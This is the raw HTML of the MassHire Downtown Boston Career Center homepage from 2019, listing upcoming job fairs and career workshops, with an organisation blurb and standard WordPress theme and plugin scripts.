rich-snippet-hidden">Home</span><span class="vcard rich-snippet-hidden"><span class="fn"><a href="https://masshiredowntownboston.org/author/masshire/" title="Posts by masshire" rel="author">masshire</a></span></span><span class="updated rich-snippet-hidden">2019-05-14T12:32:10-04:00</span> <div class="post-content"> <div class="fusion-fullwidth fullwidth-box fusion-parallax-none careerCenterTop nonhundred-percent-fullwidth hundred-percent-height non-hundred-percent-height-scrolling fusion-equal-height-columns" style='background-color: #ffffff;background-image: url("https://masshiredowntownboston.org/wp-content/uploads/career_center_hero_nologo-1200x800.jpg");background-position: center top;background-repeat: no-repeat;padding-top:20px;padding-right:0%;padding-bottom:80px;padding-left:0%;border-top-width:0px;border-bottom-width:0px;border-color:#eae9e9;border-top-style:solid;border-bottom-style:solid;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;'><div class="fusion-builder-row fusion-row "><div class="fusion-layout-column fusion_builder_column fusion_builder_column_1_1 fusion-one-full fusion-column-first fusion-column-last fusion-column-no-min-height 1_1" style='margin-top:30px;margin-bottom:20px;'> <div class="fusion-column-wrapper" style="padding: 0px 30px 0px 30px;background-position:left top;background-repeat:no-repeat;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;" data-bg-url=""> <div class="fusion-column-content-centered"><div class="fusion-column-content"><div class="fusion-title title fusion-sep-none fusion-title-center fusion-title-size-one" style="margin-top:0px;margin-bottom:10px;"><h1 class="title-heading-center"><p>MASSHIRE<br /> DOWNTOWN BOSTON<br /> CAREER CENTER</p></h1></div><div class="fusion-title title fusion-sep-none fusion-title-center fusion-title-size-three" style="margin-top:20px;margin-bottom:30px;"><h3 class="title-heading-center">Let&#8217;s Get to Work!</h3></div><div class="fusion-builder-row fusion-builder-row-inner fusion-row "><div class="fusion-layout-column fusion_builder_column fusion_builder_column_1_2 fusion-one-half fusion-column-first careerHeroBox fusion-column-inner-bg-wrapper 1_2" style='margin-top: 0px;margin-bottom: 20px;width:50%;width:calc(50% - ( ( 2% ) * 0.5 ) );margin-right:2%;'> <div class="fusion-column-wrapper" style="border-width: 2px;border-color: #ffffff;border-style: solid;padding: 20px 20px 20px 20px;" data-bg-url=""> <div class="fusion-column-content-centered"><div class="fusion-column-content"><div class="fusion-title title fusion-sep-none fusion-title-center fusion-title-size-two" style="margin-top:0px;margin-bottom:0px;"><h2 class="title-heading-center"><h2><span style="color: #ffffff;">JOB SEEKERS</span></h2></h2></div><div class="fusion-sep-clear"></div><div class="fusion-separator sep-single sep-solid" style="border-color:#fcb424;border-top-width:2px;margin-left: auto;margin-right: auto;margin-top:10px;margin-bottom:10px;width:100%;max-width:30%;"></div></div></div> </div> <span class="fusion-column-inner-bg hover-type-liftup"> <a href="https://masshiredowntownboston.org/jobseekers/"> <span class="fusion-column-inner-bg-image" style="background-color:rgba(0,152,118,0.65);background-position:left top;background-repeat:no-repeat;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;"></span></a> </span> </div><div class="fusion-layout-column fusion_builder_column fusion_builder_column_1_2 fusion-one-half fusion-column-last careerHeroBox fusion-column-inner-bg-wrapper 1_2" style='margin-top: 0px;margin-bottom: 20px;width:50%;width:calc(50% - ( ( 2% ) * 0.5 ) );'> <div class="fusion-column-wrapper" style="border-width: 2px;border-color: #ffffff;border-style: solid;padding: 20px 20px 20px 20px;" data-bg-url=""> <div class="fusion-column-content-centered"><div class="fusion-column-content"><div class="fusion-title title fusion-sep-none fusion-title-center fusion-title-size-two" style="margin-top:0px;margin-bottom:0px;"><h2 class="title-heading-center"><h2><span style="color: #ffffff;">EMPLOYERS</span></h2></h2></div><div class="fusion-sep-clear"></div><div class="fusion-separator sep-single sep-solid" style="border-color:#fcb424;border-top-width:2px;margin-left: auto;margin-right: auto;margin-top:10px;margin-bottom:10px;width:100%;max-width:30%;"></div></div></div> </div> <span class="fusion-column-inner-bg hover-type-liftup"> <a href="https://masshiredowntownboston.org/employers/"> <span class="fusion-column-inner-bg-image" style="background-color:rgba(0,152,118,0.65);background-position:left top;background-repeat:no-repeat;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;"></span></a> </span> </div></div><div class="fusion-text"><h4 style="text-align: center;">Find more resources below</h4> <p style="text-align: center;"><a class="fusion-one-page-text-link" href="#get-scrolling"><div class="fusion-fa-align-center"><i class="fontawesome-icon fa-caret-square-down far circle-no" style="font-size:48px;color:#ffffff;"></i></div></a></p> </div></div></div><div class="fusion-clearfix"></div> </div> </div></div></div><div class="fusion-fullwidth fullwidth-box nonhundred-percent-fullwidth non-hundred-percent-height-scrolling" style='background-color: rgba(255,255,255,0);background-position: center center;background-repeat: no-repeat;padding-top:20px;padding-right:30px;padding-bottom:20px;padding-left:30px;'><div class="fusion-builder-row fusion-row "><div class="fusion-layout-column fusion_builder_column fusion_builder_column_1_1 fusion-one-full fusion-column-first fusion-column-last 1_1" style='margin-top:0px;margin-bottom:20px;'> <div class="fusion-column-wrapper" style="padding: 0px 0px 0px 0px;background-position:left top;background-repeat:no-repeat;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;" data-bg-url=""> <div class="fusion-menu-anchor" id="get-scrolling"></div><div class="fusion-clearfix"></div> </div> </div></div></div><div class="fusion-fullwidth fullwidth-box nonhundred-percent-fullwidth non-hundred-percent-height-scrolling" style='background-color: rgba(255,255,255,0);background-position: center center;background-repeat: no-repeat;padding-top:0px;padding-right:30px;padding-bottom:0px;padding-left:30px;'><div class="fusion-builder-row fusion-row "><div class="fusion-layout-column fusion_builder_column fusion_builder_column_1_1 fusion-one-full fusion-column-first fusion-column-last 1_1" style='margin-top:0px;margin-bottom:20px;'> <div class="fusion-column-wrapper" style="padding: 0px 0px 0px 0px;background-position:left top;background-repeat:no-repeat;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;" data-bg-url=""> <div class="fusion-sep-clear"></div><div class="fusion-separator fusion-full-width-sep sep-single" style="border-color:#fcb424;border-top-width:2px;margin-left: auto;margin-right: auto;margin-top:;"></div><div class="fusion-clearfix"></div> </div> </div></div></div><div class="fusion-fullwidth fullwidth-box nonhundred-percent-fullwidth non-hundred-percent-height-scrolling fusion-equal-height-columns" style='background-color: rgba(255,255,255,0);background-position: center center;background-repeat: no-repeat;padding-top:20px;padding-right:30px;padding-bottom:40px;padding-left:30px;'><div class="fusion-builder-row fusion-row "><div class="fusion-layout-column fusion_builder_column fusion_builder_column_1_2 fusion-one-half fusion-column-first 1_2" style='margin-top:0px;margin-bottom:20px;width:50%;width:calc(50% - ( ( 4% ) * 0.5 ) );margin-right: 4%;'> <div class="fusion-column-wrapper" style="padding: 0px 0px 0px 0px;background-position:left top;background-repeat:no-repeat;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;" data-bg-url=""> <div class="fusion-title title fusion-sep-none fusion-title-size-one" style="margin-top:0px;margin-bottom:15px;"><h1 class="title-heading-left"></h1></div><div class="fusion-image-carousel fusion-image-carousel-auto"><div class="fusion-carousel" data-autoplay="yes" data-columns="1" data-itemmargin="30" data-itemwidth="180" data-touchscroll="no" data-imagesize="auto"><div class="fusion-carousel-positioner"><ul class="fusion-carousel-holder"><li class="fusion-carousel-item"><div class="fusion-carousel-item-wrapper"><div class="fusion-image-wrapper hover-type-none"><img width="4928" height="3264" src="https://masshiredowntownboston.org/wp-content/uploads/NOV_8_1.jpg" class="attachment-full size-full" alt="" srcset="https://masshiredowntownboston.org/wp-content/uploads/NOV_8_1-200x132.jpg 200w, https://masshiredowntownboston.org/wp-content/uploads/NOV_8_1-300x199.jpg 300w, https://masshiredowntownboston.org/wp-content/uploads/NOV_8_1-400x265.jpg 400w, https://masshiredowntownboston.org/wp-content/uploads/NOV_8_1-600x397.jpg 600w, https://masshiredowntownboston.org/wp-content/uploads/NOV_8_1-768x509.jpg 768w, https://masshiredowntownboston.org/wp-content/uploads/NOV_8_1-800x530.jpg 800w, https://masshiredowntownboston.org/wp-content/uploads/NOV_8_1-1024x678.jpg 1024w, https://masshiredowntownboston.org/wp-content/uploads/NOV_8_1-1200x795.jpg 1200w, https://masshiredowntownboston.org/wp-content/uploads/NOV_8_1.jpg 4928w" sizes="(max-width: 4928px) 100vw, 4928px" /></div></div></li><li class="fusion-carousel-item"><div class="fusion-carousel-item-wrapper"><div class="fusion-image-wrapper hover-type-none"><img width="4928" height="2724" src="https://masshiredowntownboston.org/wp-content/uploads/DSC_6098.jpg" class="attachment-full size-full" alt="" srcset="https://masshiredowntownboston.org/wp-content/uploads/DSC_6098-200x111.jpg 200w, https://masshiredowntownboston.org/wp-content/uploads/DSC_6098-300x166.jpg 300w, https://masshiredowntownboston.org/wp-content/uploads/DSC_6098-400x221.jpg 400w, https://masshiredowntownboston.org/wp-content/uploads/DSC_6098-600x332.jpg 600w, https://masshiredowntownboston.org/wp-content/uploads/DSC_6098-768x425.jpg 768w, https://masshiredowntownboston.org/wp-content/uploads/DSC_6098-800x442.jpg 800w, https://masshiredowntownboston.org/wp-content/uploads/DSC_6098-1024x566.jpg 1024w, https://masshiredowntownboston.org/wp-content/uploads/DSC_6098-1200x663.jpg 1200w, https://masshiredowntownboston.org/wp-content/uploads/DSC_6098.jpg 4928w" sizes="(max-width: 4928px) 100vw, 4928px" /></div></div></li><li class="fusion-carousel-item"><div class="fusion-carousel-item-wrapper"><div class="fusion-image-wrapper hover-type-none"><img width="4928" height="3264" src="https://masshiredowntownboston.org/wp-content/uploads/DSC_6076.jpg" class="attachment-full size-full" alt="" srcset="https://masshiredowntownboston.org/wp-content/uploads/DSC_6076-200x132.jpg 200w, https://masshiredowntownboston.org/wp-content/uploads/DSC_6076-300x199.jpg 300w, https://masshiredowntownboston.org/wp-content/uploads/DSC_6076-400x265.jpg 400w, https://masshiredowntownboston.org/wp-content/uploads/DSC_6076-600x397.jpg 600w, https://masshiredowntownboston.org/wp-content/uploads/DSC_6076-768x509.jpg 768w, https://masshiredowntownboston.org/wp-content/uploads/DSC_6076-800x530.jpg 800w, https://masshiredowntownboston.org/wp-content/uploads/DSC_6076-1024x678.jpg 1024w, https://masshiredowntownboston.org/wp-content/uploads/DSC_6076-1200x795.jpg 1200w, https://masshiredowntownboston.org/wp-content/uploads/DSC_6076.jpg 4928w" sizes="(max-width: 4928px) 100vw, 4928px" /></div></div></li><li class="fusion-carousel-item"><div class="fusion-carousel-item-wrapper"><div class="fusion-image-wrapper hover-type-none"><img width="4928" height="3264" src="https://masshiredowntownboston.org/wp-content/uploads/DSC_6087.jpg" class="attachment-full size-full" alt="" srcset="https://masshiredowntownboston.org/wp-content/uploads/DSC_6087-200x132.jpg 200w, https://masshiredowntownboston.org/wp-content/uploads/DSC_6087-300x199.jpg 300w, https://masshiredowntownboston.org/wp-content/uploads/DSC_6087-400x265.jpg 400w, https://masshiredowntownboston.org/wp-content/uploads/DSC_6087-600x397.jpg 600w, https://masshiredowntownboston.org/wp-content/uploads/DSC_6087-768x509.jpg 768w, https://masshiredowntownboston.org/wp-content/uploads/DSC_6087-800x530.jpg 800w, https://masshiredowntownboston.org/wp-content/uploads/DSC_6087-1024x678.jpg 1024w, https://masshiredowntownboston.org/wp-content/uploads/DSC_6087-1200x795.jpg 1200w, https://masshiredowntownboston.org/wp-content/uploads/DSC_6087.jpg 4928w" sizes="(max-width: 4928px) 100vw, 4928px" /></div></div></li></ul></div></div></div><div class="fusion-clearfix"></div> </div> </div><div class="fusion-layout-column fusion_builder_column fusion_builder_column_1_2 fusion-one-half fusion-column-last 1_2" style='margin-top:0px;margin-bottom:20px;width:50%;width:calc(50% - ( ( 4% ) * 0.5 ) );'> <div class="fusion-column-wrapper" style="padding: 0px 0px 0px 0px;background-position:left top;background-repeat:no-repeat;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;" data-bg-url=""> <div class="fusion-title title fusion-sep-none fusion-title-size-one" style="margin-top:0px;margin-bottom:15px;"><h1 class="title-heading-left"><h2>Featured Events</h2></h1></div><ul class="fusion-checklist fusion-checklist-1" style="font-size:22px;line-height:37.4px;"><li class="fusion-li-item"><span style="background-color:#ffffff;font-size:19.36px;height:37.4px;width:37.4px;margin-right:15.4px;" class="icon-wrapper circle-yes"><i class="fusion-li-icon fa-play fas" style="color:#ffc107;"></i></span><div class="fusion-li-item-content" style="margin-left:52.8px;"> <p class="tribe-events-single-event-title summary entry-title" data-fontsize="36" data-lineheight="39"><a href="https://masshiredowntownboston.org/event/personal-branding-3-05-20-19-2/">Personal Branding | May 20 @ 1:00 pm</a></p> </div></li><li class="fusion-li-item"><span style="background-color:#ffffff;font-size:19.36px;height:37.4px;width:37.4px;margin-right:15.4px;" class="icon-wrapper circle-yes"><i class="fusion-li-icon fa-play fas" style="color:#ffc107;"></i></span><div class="fusion-li-item-content" style="margin-left:52.8px;"> <p class="tribe-events-single-event-title summary entry-title" data-fontsize="36" data-lineheight="39"><a href="https://masshiredowntownboston.org/event/whole-foods-information-interview-event/">Whole Foods Information &amp; Interview Event | May 22 @ 3:00 pm</a></p> </div></li><li class="fusion-li-item"><span style="background-color:#ffffff;font-size:19.36px;height:37.4px;width:37.4px;margin-right:15.4px;" class="icon-wrapper circle-yes"><i class="fusion-li-icon fa-play fas" style="color:#ffc107;"></i></span><div class="fusion-li-item-content" style="margin-left:52.8px;"> <p class="tribe-events-single-event-title summary entry-title" data-fontsize="36" data-lineheight="39"><a href="https://masshiredowntownboston.org/event/linkedin-for-smallbiz-5-22-19/">LinkedIn for Small Business | May 22 @ 5:30 pm</a></p> </div></li><li class="fusion-li-item"><span style="background-color:#ffffff;font-size:19.36px;height:37.4px;width:37.4px;margin-right:15.4px;" class="icon-wrapper circle-yes"><i class="fusion-li-icon fa-play fas" style="color:#ffc107;"></i></span><div class="fusion-li-item-content" style="margin-left:52.8px;"> <p class="tribe-events-single-event-title summary entry-title" data-fontsize="36" data-lineheight="39"><a href="https://masshiredowntownboston.org/event/opportunities-in-tourism-05-24-19/">Opportunities in Tourism | May 24 @ 1:00 pm</a></p> </div></li><li class="fusion-li-item"><span style="background-color:#ffffff;font-size:19.36px;height:37.4px;width:37.4px;margin-right:15.4px;" class="icon-wrapper circle-yes"><i class="fusion-li-icon fa-play fas" style="color:#ffc107;"></i></span><div class="fusion-li-item-content" style="margin-left:52.8px;"> <p class="tribe-events-single-event-title summary entry-title" data-fontsize="36" data-lineheight="39"><a href="https://masshiredowntownboston.org/event/webinar-networking-for-introverts-3-05-29-19/">Networking for Introverts | May 29 @ 1:00 pm</a></p> </div></li><li class="fusion-li-item"><span style="background-color:#ffffff;font-size:19.36px;height:37.4px;width:37.4px;margin-right:15.4px;" class="icon-wrapper circle-yes"><i class="fusion-li-icon fa-play fas" style="color:#ffc107;"></i></span><div class="fusion-li-item-content" style="margin-left:52.8px;"> <p class="tribe-events-single-event-title summary entry-title" data-fontsize="36" data-lineheight="39"><a href="https://masshiredowntownboston.org/event/aauw-salary-negotiation-05-29-19/">AAUW Salary Negotiation | May 29 @ 5:00 pm</a></p> </div></li><li class="fusion-li-item"><span style="background-color:#ffffff;font-size:19.36px;height:37.4px;width:37.4px;margin-right:15.4px;" class="icon-wrapper circle-yes"><i class="fusion-li-icon fa-play fas" style="color:#ffc107;"></i></span><div class="fusion-li-item-content" style="margin-left:52.8px;"> <p class="tribe-events-single-event-title summary entry-title" data-fontsize="36" data-lineheight="39"><a href="https://masshiredowntownboston.org/event/linkedin-3-0-clinic-05-30-19/">LinkedIn Clinic | May 30 @ 1:00 pm</a></p> </div></li><li class="fusion-li-item"><span style="background-color:#ffffff;font-size:19.36px;height:37.4px;width:37.4px;margin-right:15.4px;" class="icon-wrapper circle-yes"><i class="fusion-li-icon fa-play fas" style="color:#ffc107;"></i></span><div class="fusion-li-item-content" style="margin-left:52.8px;"> <p class="tribe-events-single-event-title summary entry-title" data-fontsize="36" data-lineheight="39"><a href="https://masshiredowntownboston.org/event/dress-for-success-boston-06-12-19/">Dress For Success Boston | June 12 @ 1:00 pm</a></p> </div></li><li class="fusion-li-item"><span style="background-color:#ffffff;font-size:19.36px;height:37.4px;width:37.4px;margin-right:15.4px;" class="icon-wrapper circle-yes"><i class="fusion-li-icon fa-play fas" style="color:#ffc107;"></i></span><div class="fusion-li-item-content" style="margin-left:52.8px;"> <p class="tribe-events-single-event-title summary entry-title" data-fontsize="36" data-lineheight="39"><a href="https://masshiredowntownboston.org/event/banking-job-fair-06-12-19/">Banking &amp; Finance Job Fair | June 12 @ 2:00 pm</a></p> </div></li><li class="fusion-li-item"><span style="background-color:#ffffff;font-size:19.36px;height:37.4px;width:37.4px;margin-right:15.4px;" class="icon-wrapper circle-yes"><i class="fusion-li-icon fa-play fas" style="color:#ffc107;"></i></span><div class="fusion-li-item-content" style="margin-left:52.8px;"> <p class="tribe-events-single-event-title summary entry-title" data-fontsize="36" data-lineheight="39"><a href="https://masshiredowntownboston.org/event/healthcare-job-fair-06-20-19/">Healthcare Job Fair | <span class="tribe-event-date-start">June 20 @ 12:30 pm</span></a></p> </div></li></ul><div class="fusion-clearfix"></div> </div> </div></div></div><div class="fusion-fullwidth fullwidth-box nonhundred-percent-fullwidth non-hundred-percent-height-scrolling" style='background-color: rgba(255,255,255,0);background-position: center center;background-repeat: no-repeat;padding-top:0px;padding-right:30px;padding-bottom:0px;padding-left:30px;'><div class="fusion-builder-row fusion-row "><div class="fusion-layout-column fusion_builder_column fusion_builder_column_1_1 fusion-one-full fusion-column-first fusion-column-last 1_1" style='margin-top:0px;margin-bottom:20px;'> <div class="fusion-column-wrapper" style="padding: 0px 0px 0px 0px;background-position:left top;background-repeat:no-repeat;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;" data-bg-url=""> <div class="fusion-sep-clear"></div><div class="fusion-separator fusion-full-width-sep sep-single" style="border-color:#fcb424;border-top-width:2px;margin-left: auto;margin-right: auto;margin-top:;"></div><div class="fusion-clearfix"></div> </div> </div></div></div><div class="fusion-fullwidth fullwidth-box nonhundred-percent-fullwidth non-hundred-percent-height-scrolling fusion-equal-height-columns" style='background-color: rgba(255,255,255,0);background-position: center center;background-repeat: no-repeat;padding-top:40px;padding-right:0px;padding-bottom:40px;padding-left:0px;'><div class="fusion-builder-row fusion-row "><div class="fusion-layout-column fusion_builder_column fusion_builder_column_1_2 fusion-one-half fusion-column-first fusion-spacing-no 1_2" style='margin-top:-15px;margin-bottom:0px;width:50%;width:calc(50% - ( ( 0px ) * 0.5 ) );margin-right: 0px;'> <div class="fusion-column-wrapper" style="padding: 0px 0px 0px 0px;background-position:left top;background-repeat:no-repeat;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;" data-bg-url=""> <div class="fusion-column-content-centered"><div class="fusion-column-content"><div class="fusion-title title fusion-sep-none fusion-title-size-one" style="margin-top:0px;margin-bottom:15px;"><h1 class="title-heading-left">About MassHire</h1></div><div class="fusion-text"><p style="text-align: left;">MassHire creates and sustains powerful connections between businesses and jobseekers through a statewide network of employment professionals. Learn more about us below.</p> </div><div class="fusion-button-wrapper fusion-alignleft"><style type="text/css" scoped="scoped">.fusion-button.button-1 .fusion-button-text, .fusion-button.button-1 i {color:#003a5c;}.fusion-button.button-1 {border-width:0px;border-color:#003a5c;}.fusion-button.button-1 .fusion-button-icon-divider{border-color:#003a5c;}.fusion-button.button-1:hover .fusion-button-text, .fusion-button.button-1:hover i,.fusion-button.button-1:focus .fusion-button-text, .fusion-button.button-1:focus i,.fusion-button.button-1:active .fusion-button-text, .fusion-button.button-1:active{color:#fcb424;}.fusion-button.button-1:hover, .fusion-button.button-1:focus, .fusion-button.button-1:active{border-width:0px;border-color:#fcb424;}.fusion-button.button-1:hover .fusion-button-icon-divider, .fusion-button.button-1:hover .fusion-button-icon-divider, .fusion-button.button-1:active .fusion-button-icon-divider{border-color:#fcb424;}.fusion-button.button-1{background: rgba(222,26,33,0);}.fusion-button.button-1:hover,.button-1:focus,.fusion-button.button-1:active{background: rgba(0,0,0,0);}.fusion-button.button-1{width:auto;}</style><a class="fusion-button button-flat fusion-button-round button-xlarge button-custom button-1 box-button" target="_self" href="/about/"><span class="fusion-button-text">Learn More About Us</span><i class="fa-arrow-right fas button-icon-right"></i></a></div></div></div><div class="fusion-clearfix"></div> </div> </div><div class="fusion-layout-column fusion_builder_column fusion_builder_column_1_2 fusion-one-half fusion-column-last fusion-spacing-no 1_2" style='margin-top:0px;margin-bottom:0px;width:50%;width:calc(50% - ( ( 0px ) * 0.5 ) );'> <div class="fusion-column-wrapper" style="padding: 0px 0px 0px 0px;background-position:left top;background-repeat:no-repeat;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;" data-bg-url=""> <div class="fusion-column-content-centered"><div class="fusion-column-content"><div class="fusion-video fusion-youtube fusion-aligncenter" style="max-width:600px;max-height:360px; width:100%"><div class="video-shortcode"><iframe title="YouTube video player" src="https://www.youtube.com/embed/ZkNCO61_kc8?wmode=transparent&autoplay=0" width="600" height="360" allowfullscreen allow="autoplay; fullscreen"></iframe></div></div></div></div><div class="fusion-clearfix"></div> </div> </div></div></div> </div> </div> </section> </div> <!-- fusion-row --> </main> <!-- #main --> <div class="fusion-footer"> <footer class="fusion-footer-widget-area fusion-widget-area"> <div class="fusion-row"> <div class="fusion-columns fusion-columns-3 fusion-widget-area"> <div class="fusion-column col-lg-4 col-md-4 col-sm-4"> <section id="media_image-2" class="fusion-footer-widget-column widget widget_media_image"><img width="200" height="160" src="https://masshiredowntownboston.org/wp-content/uploads/CareerCenter_DowntownBoston_200px.png" class="image wp-image-14904 attachment-full size-full" alt="MassHire Downtown Boston Career Center" style="max-width: 100%; height: auto;" srcset="https://masshiredowntownboston.org/wp-content/uploads/CareerCenter_DowntownBoston_200px-177x142.png 177w, https://masshiredowntownboston.org/wp-content/uploads/CareerCenter_DowntownBoston_200px.png 200w" sizes="(max-width: 200px) 100vw, 200px" /><div style="clear:both;"></div></section><section id="contact_info-widget-3" class="fusion-footer-widget-column widget contact_info"><h4 class="widget-title">MassHire Downtown Boston Career Center</h4> <div class="contact-info-container"> <p class="address">75 Federal Street, 3rd Floor, Boston, MA 02110</p> <p class="phone">Phone: 617-399-3100</p> <p class="fax">Fax: 617-451-9973</p> </div> <div style="clear:both;"></div></section> </div> <div class="fusion-column col-lg-4 col-md-4 col-sm-4"> <section id="nav_menu-3" class="fusion-footer-widget-column widget widget_nav_menu"><div class="menu-footer-menu-container"><ul id="menu-footer-menu" class="menu"><li id="menu-item-18222" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-18222"><a href="https://masshiredowntownboston.org/aboutus/">About Us</a></li> <li id="menu-item-18224" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-18224"><a href="https://masshiredowntownboston.org/jobseekers/">Job Seekers</a></li> <li id="menu-item-18223" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-18223"><a href="https://masshiredowntownboston.org/employers/">Employers</a></li> <li id="menu-item-18225" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-18225"><a href="https://masshiredowntownboston.org/resources/">Resources</a></li> <li id="menu-item-18489" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-18489"><a href="https://masshiredowntownboston.org/events-calendar/">Events Calendar</a></li> <li id="menu-item-14144" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-14144"><a href="https://masshiredowntownboston.org/contact/">Contact</a></li> <li id="menu-item-16584" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-16584"><a href="https://masshiredowntownboston.org/sitemap/">Sitemap</a></li> </ul></div><div style="clear:both;"></div></section> </div> <div class="fusion-column fusion-column-last col-lg-4 col-md-4 col-sm-4"> <section id="text-3" class="fusion-footer-widget-column widget widget_text"><h4 class="widget-title">Subscribe</h4> <div class="textwidget"><div class="fusion-button-wrappercenter"><style type="text/css" scoped="scoped">.fusion-button.button-2 .fusion-button-text, .fusion-button.button-2 i {color:#ffffff;}.fusion-button.button-2 {border-width:0px;border-color:#ffffff;}.fusion-button.button-2 .fusion-button-icon-divider{border-color:#ffffff;}.fusion-button.button-2:hover .fusion-button-text, .fusion-button.button-2:hover i,.fusion-button.button-2:focus .fusion-button-text, .fusion-button.button-2:focus i,.fusion-button.button-2:active .fusion-button-text, .fusion-button.button-2:active{color:#003a5c;}.fusion-button.button-2:hover, .fusion-button.button-2:focus, .fusion-button.button-2:active{border-width:0px;border-color:#003a5c;}.fusion-button.button-2:hover .fusion-button-icon-divider, .fusion-button.button-2:hover .fusion-button-icon-divider, .fusion-button.button-2:active .fusion-button-icon-divider{border-color:#003a5c;}.fusion-button.button-2{width:100%;}</style><a class="fusion-button button-flat fusion-button-round button-xlarge button-default button-2" target="_blank" rel="noopener noreferrer" href="https://visitor.r20.constantcontact.com/manage/optin?v=001iSHr32lsdppEsm1y11e4BwEAlFF3DvgOuJh4wgDiwJyjOwOK27EBP7HwE6Fncvt8zewMxYilHMTJAzTjciz8wZzU9wD8l8C4430o-3VM3OnDYZxm4E4OvyeaiZUuUxCB8ubCOm5UjcCLKEOzbmDo0c0Egse0KSPgeuqV8ch3QbE%3D"><span class="fusion-button-text">Newsletter Sign Up</span></a></div></div> <div style="clear:both;"></div></section><section id="social_links-widget-2" class="fusion-footer-widget-column widget social_links"><h4 class="widget-title">Connect With Us</h4> <div class="fusion-social-networks boxed-icons"> <div class="fusion-social-networks-wrapper"> <a class="fusion-social-network-icon fusion-tooltip fusion-facebook fusion-icon-facebook" href="https://www.facebook.com/MHDowntownBos/" data-placement="top" data-title="Facebook" data-toggle="tooltip" data-original-title="" title="Facebook" aria-label="Facebook" rel="noopener noreferrer" target="_self" style="border-radius:4px;padding:8px;font-size:16px;color:#ffffff;background-color:#3b5998;border-color:#3b5998;"></a> <a class="fusion-social-network-icon fusion-tooltip fusion-twitter fusion-icon-twitter" href="http://twitter.com/MHDowntownBos" data-placement="top" data-title="Twitter" data-toggle="tooltip" data-original-title="" title="Twitter" aria-label="Twitter" rel="noopener noreferrer" target="_self" style="border-radius:4px;padding:8px;font-size:16px;color:#ffffff;background-color:#55acee;border-color:#55acee;"></a> <a class="fusion-social-network-icon fusion-tooltip fusion-linkedin fusion-icon-linkedin" href="https://www.linkedin.com/company/masshiredowntownboston/" data-placement="top" data-title="LinkedIn" data-toggle="tooltip" data-original-title="" title="LinkedIn" aria-label="LinkedIn" rel="noopener noreferrer" target="_self" style="border-radius:4px;padding:8px;font-size:16px;color:#ffffff;background-color:#0077b5;border-color:#0077b5;"></a> </div> </div> <div style="clear:both;"></div></section><section id="media_image-4" class="fusion-footer-widget-column widget widget_media_image"><a href="https://www.careeronestop.org/Site/american-job-center.aspx" target="_blank" rel="noopener noreferrer"><img width="250" height="83" src="https://masshiredowntownboston.org/wp-content/uploads/AJC_logo-partner-300x100.png" class="image wp-image-17447 attachment-250x83 size-250x83" alt="AJC Partner" style="max-width: 100%; height: auto;" srcset="https://masshiredowntownboston.org/wp-content/uploads/AJC_logo-partner-200x67.png 200w, https://masshiredowntownboston.org/wp-content/uploads/AJC_logo-partner.png 300w" sizes="(max-width: 250px) 100vw, 250px" /></a><div style="clear:both;"></div></section> </div> <div class="fusion-clearfix"></div> </div> <!-- fusion-columns --> </div> <!-- fusion-row --> </footer> <!-- fusion-footer-widget-area --> <footer id="footer" class="fusion-footer-copyright-area fusion-footer-copyright-center"> <div class="fusion-row"> <div class="fusion-copyright-content"> <div class="fusion-copyright-notice"> <div> © <script>document.write(new Date().getFullYear());</script> MassHire. All Rights Reserved. | <a href="https://masshiredowntownboston.org/accessibility-statement/">Accessibility Statement</a> <br>Veterans and their eligible spouses receive priority of service. <br> MassHire Downtown Boston is an EEO Employer. Auxiliary aids or services are available upon request to individuals with disabilities. </div> </div> </div> <!-- fusion-fusion-copyright-content --> </div> <!-- fusion-row --> </footer> <!-- #footer --> </div> <!-- fusion-footer --> </div> <!-- wrapper --> <a class="fusion-one-page-text-link fusion-page-load-link"></a> <script type="text/javascript"> var _userway_config = { // position below will override position set via widget //position: 1, account: 'Dwu7g3GPp9' }; </script> <script type="text/javascript" src="https://cdn.userway.org/widget.js"></script> <script> ( function ( body ) { 'use strict'; body.className = body.className.replace( /\btribe-no-js\b/, 'tribe-js' ); } )( document.body ); </script> <script type="text/javascript"> jQuery( document ).ready( function() { var ajaxurl = 'https://masshiredowntownboston.org/wp-admin/admin-ajax.php'; if ( 0 < jQuery( '.fusion-login-nonce' ).length ) { jQuery.get( ajaxurl, { 'action': 'fusion_login_nonce' }, function( response ) { jQuery( '.fusion-login-nonce' ).html( response ); }); } }); </script> <script> /* <![CDATA[ */var tribe_l10n_datatables = {"aria":{"sort_ascending":": activate to sort column ascending","sort_descending":": activate to sort column descending"},"length_menu":"Show _MENU_ entries","empty_table":"No data available in table","info":"Showing _START_ to _END_ of _TOTAL_ entries","info_empty":"Showing 0 to 0 of 0 entries","info_filtered":"(filtered from _MAX_ total entries)","zero_records":"No matching records found","search":"Search:","all_selected_text":"All items on this page were selected. ","select_all_link":"Select all pages","clear_selection":"Clear Selection.","pagination":{"all":"All","next":"Next","previous":"Previous"},"select":{"rows":{"0":"","_":": Selected %d rows","1":": Selected 1 